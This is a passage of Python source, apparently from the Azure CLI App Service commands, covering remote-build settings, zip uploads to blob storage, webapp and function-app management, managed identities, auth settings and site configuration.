    # NOTE(review): this raises for ANY remaining status, including 200 — with isAsync=true
    # a success is always 202, so 200 is presumably unreachable; confirm before changing.
    if res.status_code:
        raise AzureInternalError("An error occured during deployment. 
Status Code: {}, Details: {}"
                                 .format(res.status_code, res.text))


def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
    """Configure app settings for a Kudu/Oryx remote build and wait until SCM sees them."""
    settings = get_app_settings(cmd, resource_group_name, name, slot)
    scm_do_build_during_deployment = None
    website_run_from_package = None
    enable_oryx_build = None

    app_settings_should_not_have = []
    app_settings_should_contain = {}

    # Snapshot current values of the three settings that affect remote builds.
    for keyval in settings:
        value = keyval['value'].lower()
        if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
            scm_do_build_during_deployment = value in ('true', '1')
        if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
            website_run_from_package = value
        if keyval['name'] == 'ENABLE_ORYX_BUILD':
            enable_oryx_build = value

    if scm_do_build_during_deployment is not True:
        logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
        update_app_settings(cmd, resource_group_name, name, [
            "SCM_DO_BUILD_DURING_DEPLOYMENT=true"
        ], slot)
        app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'

    if website_run_from_package:
        logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
        delete_app_settings(cmd, resource_group_name, name, [
            "WEBSITE_RUN_FROM_PACKAGE"
        ], slot)
        app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')

    if enable_oryx_build:
        logger.warning("Removing ENABLE_ORYX_BUILD app setting")
        delete_app_settings(cmd, resource_group_name, name, [
            "ENABLE_ORYX_BUILD"
        ], slot)
        app_settings_should_not_have.append('ENABLE_ORYX_BUILD')

    # Wait for scm site to get the latest app settings
    if app_settings_should_not_have or app_settings_should_contain:
        logger.warning("Waiting SCM site to be updated with the latest app settings")
        scm_is_up_to_date = False
        retries = 10
        while not scm_is_up_to_date and retries >= 0:
            scm_is_up_to_date = validate_app_settings_in_scm(
                cmd, resource_group_name, name, slot,
                should_contain=app_settings_should_contain,
                should_not_have=app_settings_should_not_have)
            retries -= 1
            time.sleep(5)

        if retries < 0:
            logger.warning("App settings may not be propagated to the SCM 
site.") def remove_remote_build_app_settings(cmd, resource_group_name, name, slot): settings = get_app_settings(cmd, resource_group_name, name, slot) scm_do_build_during_deployment = None app_settings_should_contain = {} for keyval in settings: value = keyval['value'].lower() if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT': scm_do_build_during_deployment = value in ('true', '1') if scm_do_build_during_deployment is not False: logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false") update_app_settings(cmd, resource_group_name, name, [ "SCM_DO_BUILD_DURING_DEPLOYMENT=false" ], slot) app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false' # Wait for scm site to get the latest app settings if app_settings_should_contain: logger.warning("Waiting SCM site to be updated with the latest app settings") scm_is_up_to_date = False retries = 10 while not scm_is_up_to_date and retries >= 0: scm_is_up_to_date = validate_app_settings_in_scm( cmd, resource_group_name, name, slot, should_contain=app_settings_should_contain) retries -= 1 time.sleep(5) if retries < 0: logger.warning("App settings may not be propagated to the SCM site") def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None): settings = get_app_settings(cmd, resource_group_name, name, slot) storage_connection = None for keyval in settings: if keyval['name'] == 'AzureWebJobsStorage': storage_connection = str(keyval['value']) if storage_connection is None: raise CLIError('Could not find a \'AzureWebJobsStorage\' application setting') container_name = "function-releases" blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4())) BlockBlobService = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService') block_blob_service = BlockBlobService(connection_string=storage_connection) if not block_blob_service.exists(container_name): block_blob_service.create_container(container_name) # 
https://gist.github.com/vladignatyev/06860ec2040cb497f0f3 def progress_callback(current, total): total_length = 30 filled_length = int(round(total_length * current) / float(total)) percents = round(100.0 * current / float(total), 1) progress_bar = '=' * filled_length + '-' * (total_length - filled_length) progress_message = 'Uploading {} {}%'.format(progress_bar, percents) cmd.cli_ctx.get_progress_controller().add(message=progress_message) block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True, progress_callback=progress_callback) now = datetime.datetime.utcnow() blob_start = now - datetime.timedelta(minutes=10) blob_end = now + datetime.timedelta(weeks=520) BlobPermissions = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions') blob_token = block_blob_service.generate_blob_shared_access_signature(container_name, blob_name, permission=BlobPermissions(read=True), expiry=blob_end, start=blob_start) blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token) website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri) update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting]) client = web_client_factory(cmd.cli_ctx) try: logger.info('\nSyncing Triggers...') if slot is not None: client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot) else: client.web_apps.sync_function_triggers(resource_group_name, name) except CloudError as ex: # This SDK function throws an error if Status Code is 200 if ex.status_code != 200: raise ex except Exception as ex: # pylint: disable=broad-except if ex.response.status_code != 200: raise ex def show_webapp(cmd, resource_group_name, name, slot=None): return _show_app(cmd, resource_group_name, name, "webapp", slot) # for generic updater def get_webapp(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot) def 
set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,  # pylint: disable=unused-argument
               skip_custom_domain_verification=None, force_dns_registration=None,
               ttl_in_seconds=None, **kwargs):  # pylint: disable=unused-argument
    # Generic setter used by 'az webapp update': pushes the full site envelope back.
    instance = kwargs['parameters']
    client = web_client_factory(cmd.cli_ctx)
    updater = client.web_apps.begin_create_or_update_slot if slot else client.web_apps.begin_create_or_update
    kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance)
    if slot:
        kwargs['slot'] = slot

    return updater(**kwargs)


def update_webapp(instance, client_affinity_enabled=None, https_only=None):
    """Apply in-memory updates to a webapp instance; flags arrive as 'true'/'false' strings."""
    if 'function' in instance.kind:
        raise CLIError("please use 'az functionapp update' to update this function app")
    if client_affinity_enabled is not None:
        instance.client_affinity_enabled = client_affinity_enabled == 'true'
    if https_only is not None:
        instance.https_only = https_only == 'true'

    return instance


def update_functionapp(cmd, instance, plan=None, force=False):
    """Apply in-memory updates to a function app, validating any plan move first."""
    client = web_client_factory(cmd.cli_ctx)
    if plan is not None:
        if is_valid_resource_id(plan):
            dest_parse_result = parse_resource_id(plan)
            dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
                                                          dest_parse_result['name'])
        else:
            # Plain plan name: assume it lives in the app's own resource group.
            dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
        if dest_plan_info is None:
            raise ResourceNotFoundError("The plan '{}' doesn't exist".format(plan))
        validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info, force)
        instance.server_farm_id = dest_plan_info.id
    return instance


def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance, force):
    """Raise unless moving between Consumption and Elastic Premium Windows plans is allowed."""
    general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.'
    src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
    src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
                                                 src_parse_result['name'])

    if src_plan_info is None:
        raise ResourceNotFoundError('Could not determine the current plan of the functionapp')

    # Ensure all plans involved are windows. Reserved = true indicates Linux.
    if src_plan_info.reserved or dest_plan_instance.reserved:
        raise ValidationError('This feature currently supports windows to windows plan migrations. For other '
                              'migrations, please redeploy.')

    src_is_premium = is_plan_elastic_premium(cmd, src_plan_info)
    dest_is_consumption = is_plan_consumption(cmd, dest_plan_instance)

    # Both source and destination must be Consumption or Elastic Premium.
    if not (is_plan_consumption(cmd, src_plan_info) or src_is_premium):
        raise ValidationError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' +
                              general_switch_msg)
    if not (dest_is_consumption or is_plan_elastic_premium(cmd, dest_plan_instance)):
        raise ValidationError('You are trying to move to a plan that is not a Consumption or an '
                              'Elastic Premium plan. ' + general_switch_msg)

    # Premium -> Consumption is a potentially breaking downgrade: warn, and require --force.
    if src_is_premium and dest_is_consumption:
        logger.warning('WARNING: Moving a functionapp from Premium to Consumption might result in loss of '
                       'functionality and cause the app to break. 
Please ensure the functionapp is compatible '
                       'with a Consumption plan and is not using any features only available in Premium.')
        if not force:
            raise RequiredArgumentMissingError('If you want to migrate a functionapp from a Premium to Consumption '
                                               'plan, please re-run this command with the \'--force\' flag.')


def set_functionapp(cmd, resource_group_name, name, **kwargs):
    """Generic setter used by 'az functionapp update': pushes the full site envelope back."""
    instance = kwargs['parameters']
    client = web_client_factory(cmd.cli_ctx)
    return client.web_apps.begin_create_or_update(resource_group_name, name, site_envelope=instance)


def get_functionapp(cmd, resource_group_name, name, slot=None):
    """Get a site and verify it actually is a function app."""
    function_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    if not function_app or 'function' not in function_app.kind:
        raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
    return function_app


def show_functionapp(cmd, resource_group_name, name, slot=None):
    return _show_app(cmd, resource_group_name, name, 'functionapp', slot)


def list_webapp(cmd, resource_group_name=None):
    """List webapps, excluding function apps and kind-less entries."""
    full_list = _list_app(cmd.cli_ctx, resource_group_name)
    # ignore apps with kind==null & not functions apps
    return list(filter(lambda x: x.kind is not None and "function" not in x.kind.lower(), full_list))


def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
    """List soft-deleted webapps, sorted by deleted-site id."""
    result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
    return sorted(result, key=lambda site: site.deleted_site_id)


def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
    """Restore a soft-deleted webapp into an existing app (optionally content only)."""
    DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
    request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_restore_from_deleted_app',
                                   slot, request)


def list_function_app(cmd, resource_group_name=None):
    """List only function apps (kind contains 'function')."""
    return list(filter(lambda x: x.kind is not 
None and "function" in x.kind.lower(), _list_app(cmd.cli_ctx, resource_group_name))) def _show_app(cmd, resource_group_name, name, cmd_app_type, slot=None): app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot) if not app: raise ResourceNotFoundError("Unable to find {} '{}', in RG '{}'.".format( cmd_app_type, name, resource_group_name)) app_type = _kind_to_app_type(app.kind) if app else None if app_type != cmd_app_type: raise ResourceNotFoundError( "Unable to find {app_type} '{name}', in resource group '{resource_group}'".format( app_type=cmd_app_type, name=name, resource_group=resource_group_name), "Use 'az {app_type} show' to show {app_type}s".format(app_type=app_type)) app.site_config = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot) _rename_server_farm_props(app) _fill_ftp_publishing_url(cmd, app, resource_group_name, name, slot) return app def _kind_to_app_type(kind): if "workflow" in kind: return "logicapp" if "function" in kind: return "functionapp" return "webapp" def _list_app(cli_ctx, resource_group_name=None): client = web_client_factory(cli_ctx) if resource_group_name: result = list(client.web_apps.list_by_resource_group(resource_group_name)) else: result = list(client.web_apps.list()) for webapp in result: _rename_server_farm_props(webapp) return result def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None): client = web_client_factory(cli_ctx) locations = _get_deleted_apps_locations(cli_ctx) result = [] for location in locations: result = result + list(client.deleted_web_apps.list_by_location(location)) if resource_group_name: result = [r for r in result if r.resource_group == resource_group_name] if name: result = [r for r in result if r.deleted_site_name.lower() == name.lower()] if slot: result = [r for r in result if r.slot.lower() == slot.lower()] return result def _build_identities_info(identities): from ._appservice_utils import MSI_LOCAL_ID 
    identities = identities or []
    identity_types = []
    # No explicit list, or the [system] marker present, means system-assigned identity.
    if not identities or MSI_LOCAL_ID in identities:
        identity_types.append('SystemAssigned')
    external_identities = [x for x in identities if x != MSI_LOCAL_ID]
    if external_identities:
        identity_types.append('UserAssigned')
    identity_types = ','.join(identity_types)
    info = {'type': identity_types}
    if external_identities:
        info['userAssignedIdentities'] = {e: {} for e in external_identities}
    return (info, identity_types, external_identities, 'SystemAssigned' in identity_types)


def assign_identity(cmd, resource_group_name, name, assign_identities=None, role='Contributor', slot=None, scope=None):
    """Assign managed identities to a site, optionally granting 'role' over 'scope'."""
    ManagedServiceIdentity, ResourceIdentityType = cmd.get_models('ManagedServiceIdentity',
                                                                  'ManagedServiceIdentityType')
    UserAssignedIdentitiesValue = cmd.get_models('Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties')  # pylint: disable=line-too-long
    _, _, external_identities, enable_local_identity = _build_identities_info(assign_identities)

    def getter():
        return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)

    def setter(webapp):
        # Combine the identity type already on the app with what is being assigned.
        if webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned_user_assigned:
            identity_types = ResourceIdentityType.system_assigned_user_assigned
        elif webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned and external_identities:
            identity_types = ResourceIdentityType.system_assigned_user_assigned
        elif webapp.identity and webapp.identity.type == ResourceIdentityType.user_assigned and enable_local_identity:
            identity_types = ResourceIdentityType.system_assigned_user_assigned
        elif external_identities and enable_local_identity:
            identity_types = ResourceIdentityType.system_assigned_user_assigned
        elif external_identities:
            identity_types = ResourceIdentityType.user_assigned
        else:
            identity_types = ResourceIdentityType.system_assigned

        if webapp.identity:
            webapp.identity.type = identity_types
        else:
            webapp.identity = ManagedServiceIdentity(type=identity_types)
        if external_identities:
            if not webapp.identity.user_assigned_identities:
                webapp.identity.user_assigned_identities = {}
            for identity in external_identities:
                webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()

        poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update',
                                         extra_parameter=webapp, slot=slot)
        return LongRunningOperation(cmd.cli_ctx)(poller)

    from azure.cli.core.commands.arm import assign_identity as _assign_identity
    webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
    return webapp.identity


def show_identity(cmd, resource_group_name, name, slot=None):
    """Return the managed identity block of a site."""
    web_app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    if not web_app:
        raise ResourceNotFoundError("Unable to find App {} in resource group {}".format(name, resource_group_name))
    return web_app.identity


def remove_identity(cmd, resource_group_name, name, remove_identities=None, slot=None):
    """Remove managed identities from a site ([system] marker removes the system identity)."""
    IdentityType = cmd.get_models('ManagedServiceIdentityType')
    UserAssignedIdentitiesValue = cmd.get_models('Components1Jq1T4ISchemasManagedserviceidentityPropertiesUserassignedidentitiesAdditionalproperties')  # pylint: disable=line-too-long
    _, _, external_identities, remove_local_identity = _build_identities_info(remove_identities)

    def getter():
        return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)

    def setter(webapp):
        if webapp.identity is None:
            return webapp
        to_remove = []
        existing_identities = {x.lower() for x in list((webapp.identity.user_assigned_identities or {}).keys())}
        if external_identities:
            to_remove = {x.lower() for x in external_identities}
            non_existing = to_remove.difference(existing_identities)
            if non_existing:
                raise CLIError("'{}' are not associated with '{}'".format(','.join(non_existing), name))
            # When every user-assigned identity is being removed, drop the UserAssigned type bit.
            if not list(existing_identities - to_remove):
                if webapp.identity.type == IdentityType.user_assigned:
                    webapp.identity.type = IdentityType.none
                elif webapp.identity.type == IdentityType.system_assigned_user_assigned:
                    webapp.identity.type = IdentityType.system_assigned
        webapp.identity.user_assigned_identities = None
        if remove_local_identity:
            webapp.identity.type = (IdentityType.none
                                    if webapp.identity.type == IdentityType.system_assigned or
                                    webapp.identity.type == IdentityType.none
                                    else IdentityType.user_assigned)

        # Rebuild the user-assigned map with whatever identities survive the removal.
        if webapp.identity.type not in [IdentityType.none, IdentityType.system_assigned]:
            webapp.identity.user_assigned_identities = {}
        if to_remove:
            for identity in list(existing_identities - to_remove):
                webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
        else:
            for identity in list(existing_identities):
                webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()

        poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update', slot, webapp)
        return LongRunningOperation(cmd.cli_ctx)(poller)

    from azure.cli.core.commands.arm import assign_identity as _assign_identity
    webapp = _assign_identity(cmd.cli_ctx, getter, setter)
    return webapp.identity


def get_auth_settings(cmd, resource_group_name, name, slot=None):
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)


def is_auth_runtime_version_valid(runtime_version=None):
    """Return True when runtime_version is None, '~N', or a numeric 'x.y.z' triple."""
    if runtime_version is None:
        return True
    if runtime_version.startswith("~") and len(runtime_version) > 1:
        try:
            int(runtime_version[1:])
        except ValueError:
            return False
        return True
    split_versions = runtime_version.split('.')
    if len(split_versions) != 3:
        return False
    for version in split_versions:
        try:
            int(version)
        except ValueError:
            return False
    return True


def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None,  # pylint: disable=unused-argument
                         client_id=None, token_store_enabled=None, runtime_version=None,  # pylint: disable=unused-argument
                         token_refresh_extension_hours=None,  # pylint: 
disable=unused-argument
                         allowed_external_redirect_urls=None, client_secret=None,  # pylint: disable=unused-argument
                         client_secret_certificate_thumbprint=None,  # pylint: disable=unused-argument
                         allowed_audiences=None, issuer=None, facebook_app_id=None,  # pylint: disable=unused-argument
                         facebook_app_secret=None, facebook_oauth_scopes=None,  # pylint: disable=unused-argument
                         twitter_consumer_key=None, twitter_consumer_secret=None,  # pylint: disable=unused-argument
                         google_client_id=None, google_client_secret=None,  # pylint: disable=unused-argument
                         google_oauth_scopes=None, microsoft_account_client_id=None,  # pylint: disable=unused-argument
                         microsoft_account_client_secret=None,  # pylint: disable=unused-argument
                         microsoft_account_oauth_scopes=None, slot=None):  # pylint: disable=unused-argument
    """Update Easy Auth settings; every supplied keyword is reflected onto the settings object."""
    auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
    UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
    if action == 'AllowAnonymous':
        auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
    elif action:
        auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
        auth_settings.default_provider = AUTH_TYPES[action]
    # validate runtime version
    if not is_auth_runtime_version_valid(runtime_version):
        raise CLIError('Usage Error: --runtime-version set to invalid value')

    # Reflect over this function's own arguments to copy any non-None value
    # onto auth_settings without spelling each assignment out.
    import inspect
    frame = inspect.currentframe()
    bool_flags = ['enabled', 'token_store_enabled']
    # note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5 args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method for arg in args[2:]: if values.get(arg, None): setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true') return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings) def list_instances(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_instance_identifiers', slot) # Currently using hardcoded values instead of this function. This function calls the stacks API; # Stacks API is updated with Antares deployments, # which are infrequent and don't line up with stacks EOL schedule. def list_runtimes(cmd, linux=False): client = web_client_factory(cmd.cli_ctx) runtime_helper = _StackRuntimeHelper(cmd=cmd, client=client, linux=linux) return [s['displayName'] for s in runtime_helper.stacks] def list_runtimes_hardcoded(linux=False): if linux: return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['linux']] return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['windows']] def delete_function_app(cmd, resource_group_name, name, slot=None): return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot) def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None, keep_dns_registration=None, slot=None): # pylint: disable=unused-argument client = web_client_factory(cmd.cli_ctx) if slot: client.web_apps.delete_slot(resource_group_name, name, slot, delete_metrics=False if keep_metrics else None, delete_empty_server_farm=False if keep_empty_plan else None) else: client.web_apps.delete(resource_group_name, name, delete_metrics=False if keep_metrics else None, delete_empty_server_farm=False if keep_empty_plan else None) def stop_webapp(cmd, resource_group_name, name, slot=None): return 
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)


def start_webapp(cmd, resource_group_name, name, slot=None):
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)


def restart_webapp(cmd, resource_group_name, name, slot=None):
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)


def get_site_configs(cmd, resource_group_name, name, slot=None):
    return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)


def get_app_settings(cmd, resource_group_name, name, slot=None):
    """List app settings, annotated with which ones are slot-sticky."""
    result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
    client = web_client_factory(cmd.cli_ctx)
    slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
    return _build_app_settings_output(result.properties, slot_app_setting_names)


# Check if the app setting is propagated to the Kudu site correctly by calling api/settings endpoint
# should_have [] is a list of app settings which are expected to be set
# should_not_have [] is a list of app settings which are expected to be absent
# should_contain {} is a dictionary of app settings which are expected to be set with precise values
# Return True if validation succeeded
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
                                 should_have=None, should_not_have=None, should_contain=None):
    scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
    scm_setting_keys = set(scm_settings.keys())

    if should_have and not set(should_have).issubset(scm_setting_keys):
        return False

    if should_not_have and set(should_not_have).intersection(scm_setting_keys):
        return False

    # If merging the expected pairs changes nothing, they were all already present.
    temp_setting = scm_settings.copy()
    temp_setting.update(should_contain or {})
    if temp_setting != scm_settings:
        return False

    return True


@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, 
slot=None): scm_url = _get_scm_url(cmd, resource_group_name, name, slot) settings_url = '{}/api/settings'.format(scm_url) username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot) headers = { 'Content-Type': 'application/octet-stream', 'Cache-Control': 'no-cache', 'User-Agent': get_az_user_agent() } import requests response = requests.get(settings_url, headers=headers, auth=(username, password), timeout=3) return response.json() or {} def get_connection_strings(cmd, resource_group_name, name, slot=None): result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot) client = web_client_factory(cmd.cli_ctx) slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \ .connection_string_names or [] result = [{'name': p, 'value': result.properties[p].value, 'type':result.properties[p].type, 'slotSetting': p in slot_constr_names} for p in result.properties] return result def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None): client = web_client_factory(cmd.cli_ctx) result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_azure_storage_accounts', slot) slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \ .azure_storage_config_names or [] return [{'name': p, 'value': result.properties[p], 'slotSetting': p in slot_azure_storage_config_names} for p in result.properties] def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None): profiles = list_publish_profiles(cmd, resource_group_name, name, slot) try: url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP') setattr(webapp, 'ftpPublishingUrl', url) except StopIteration: pass return webapp def _format_fx_version(custom_image_name, container_config_type=None): lower_custom_image_name = custom_image_name.lower() if "https://" in lower_custom_image_name or "http://" in 
lower_custom_image_name: custom_image_name = lower_custom_image_name.replace("https://", "").replace("http://", "") fx_version = custom_image_name.strip() fx_version_lower = fx_version.lower() # handles case of only spaces if fx_version: if container_config_type: fx_version = '{}|{}'.format(container_config_type, custom_image_name) elif not fx_version_lower.startswith('docker|'): fx_version = '{}|{}'.format('DOCKER', custom_image_name) else: fx_version = ' ' return fx_version def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None): fx_version = _format_fx_version(custom_image_name) web_app = get_webapp(cmd, resource_group_name, name, slot) if not web_app: raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name)) linux_fx = fx_version if (web_app.reserved or not web_app.is_xenon) else None windows_fx = fx_version if web_app.is_xenon else None return update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot) def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None): return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot) def _get_fx_version(cmd, resource_group_name, name, slot=None): site_config = get_site_configs(cmd, resource_group_name, name, slot) return site_config.linux_fx_version or site_config.windows_fx_version or '' def url_validator(url): try: result = urlparse(url) return all([result.scheme, result.netloc, result.path]) except ValueError: return False def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None): from base64 import b64decode linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot) if not any(linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES): raise CLIError("Cannot decode config that is not one of the" " following types: {}".format(','.join(MULTI_CONTAINER_TYPES))) return 
b64decode(linux_fx_version.split('|')[1].encode('utf-8')) def _get_linux_multicontainer_encoded_config_from_file(file_name): from base64 import b64encode config_file_bytes = None if url_validator(file_name): response = urlopen(file_name, context=_ssl_context()) config_file_bytes = response.read() else: with open(file_name, 'rb') as f: config_file_bytes = f.read() # Decode base64 encoded byte array into string return b64encode(config_file_bytes).decode('utf-8') # for any modifications to the non-optional parameters, adjust the reflection logic accordingly # in the method # pylint: disable=unused-argument def update_site_configs(cmd, resource_group_name, name, slot=None, number_of_workers=None, linux_fx_version=None, windows_fx_version=None, pre_warmed_instance_count=None, php_version=None, python_version=None, net_framework_version=None, java_version=None, java_container=None, java_container_version=None, remote_debugging_enabled=None, web_sockets_enabled=None, always_on=None, auto_heal_enabled=None, use32_bit_worker_process=None, min_tls_version=None, http20_enabled=None, app_command_line=None, ftps_state=None, vnet_route_all_enabled=None, generic_configurations=None): configs = get_site_configs(cmd, resource_group_name, name, slot) if number_of_workers is not None: number_of_workers = validate_range_of_int_flag('--number-of-workers', number_of_workers, min_val=0, max_val=20) if linux_fx_version: if linux_fx_version.strip().lower().startswith('docker|'): update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"]) else: delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"]) if pre_warmed_instance_count is not None: pre_warmed_instance_count = validate_range_of_int_flag('--prewarmed-instance-count', pre_warmed_instance_count, min_val=0, max_val=20) import inspect frame = inspect.currentframe() bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on', 'auto_heal_enabled', 
'use32_bit_worker_process', 'http20_enabled', 'vnet_route_all_enabled'] int_flags = ['pre_warmed_instance_count', 'number_of_workers'] # note: getargvalues is used already in azure.cli.core.commands. # and no simple functional replacement for this deprecating method for 3.5 args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method for arg in args[3:]: if arg in int_flags and values[arg] is not None: values[arg] = validate_and_convert_to_int(arg, values[arg]) if arg != 'generic_configurations' and values.get(arg, None): setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true') generic_configurations = generic_configurations or [] # https://github.com/Azure/azure-cli/issues/14857 updating_ip_security_restrictions = False result = {} for s in generic_configurations: try: json_object = get_json_object(s) for config_name in json_object: if config_name.lower() == 'ip_security_restrictions': updating_ip_security_restrictions = True result.update(json_object) except CLIError: config_name, value = s.split('=', 1) result[config_name] = value for config_name, value in result.items(): if config_name.lower() == 'ip_security_restrictions': updating_ip_security_restrictions = True setattr(configs, config_name, value) if not updating_ip_security_restrictions: setattr(configs, 'ip_security_restrictions', None) setattr(configs, 'scm_ip_security_restrictions', None) return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs) def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None): app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot) client = web_client_factory(cmd.cli_ctx) slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) is_slot_settings = False for setting_name in setting_names: app_settings.properties.pop(setting_name, None) if 
slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names: slot_cfg_names.app_setting_names.remove(setting_name) is_slot_settings = True if is_slot_settings: client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names) result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name, 'update_application_settings', app_settings, slot, client) return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names) def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None): azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_azure_storage_accounts', slot) client = web_client_factory(cmd.cli_ctx) slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) is_slot_settings = False azure_storage_accounts.properties.pop(custom_id, None) if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names: slot_cfg_names.azure_storage_config_names.remove(custom_id) is_slot_settings = True if is_slot_settings: client.web_apps.update_slot_configuration_names(resource_group_name, name, 